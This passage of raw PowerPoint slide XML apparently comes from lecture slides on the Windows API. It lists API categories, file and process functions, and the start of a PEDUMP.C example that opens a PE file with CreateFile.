              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>User Interface</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Provides the functions to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>create and manage screen windows</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>most basic controls</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, such as buttons and scrollbars, receive mouse and keyboard input, and other functions associated with the graphical user interface (GUI) part of Windows (user32.dll)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-180720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>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Windows API - Category</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="620" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="56000"/>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Common Dialog Box Library</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Provides applications the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>standard dialog boxes </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>to open and save files, choose color and font, etc. (comdlg32.dll) </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="556"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Common Control Library</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Gives applications access to some advanced controls provided by the operating system, i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>status bars</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>progress bars</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>toolbars</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>tabs </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>(comctl32.dll). </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="556"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Windows Shell</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Allows applications to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>access functions provided by the operating system shell</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, and to change and enhance it (shell32.dll).</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="556"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Network Services</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Give access to the various networking abilities of the operating system, i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>NetBIOS</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Winsock</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>NetDDE</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, remote procedure call (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>RPC</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>) and many more (netapi32.dll).</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-166320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="556"/>
              </a:spcBef>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-16920" y="-1008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Windows API (E.g.)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="622" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="86000"/>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File System API Functions</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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CreateFile; DeleteFile;</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ReadFile(Ex); WriteFile(Ex)</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FindFirstFile(Ex); FindNextFile; FindClose</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CreateFileMapping/MapViewOfFile/UnmapViewOfFile</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GetFileAttribute</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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E.g. PEDUMP.C</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Process API Functions</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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CreateToolhelp32Snapshot</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Process32First(W); Process32Next</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OpenProcess; OpenThread; TerminateProcess; TerminateThread</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143640" cy="1124280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="fbd4b4"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="624" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="625" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9036000" cy="66625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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>void DumpFile(LPSTR filename)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>HANDLE hFile;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>HANDLE hFileMapping;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>LPVOID lpFileBase;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>PIMAGE_DOS_HEADER dosHeader;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>hFile = </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>CreateFile</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>(filename, GENERIC_READ, FILE_SHARE_READ, NULL,</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>                        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);              </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>if ( hFile = = INVALID_HANDLE_VALUE )</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>{   printf("Couldn't open file with CreateFile()\n");</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
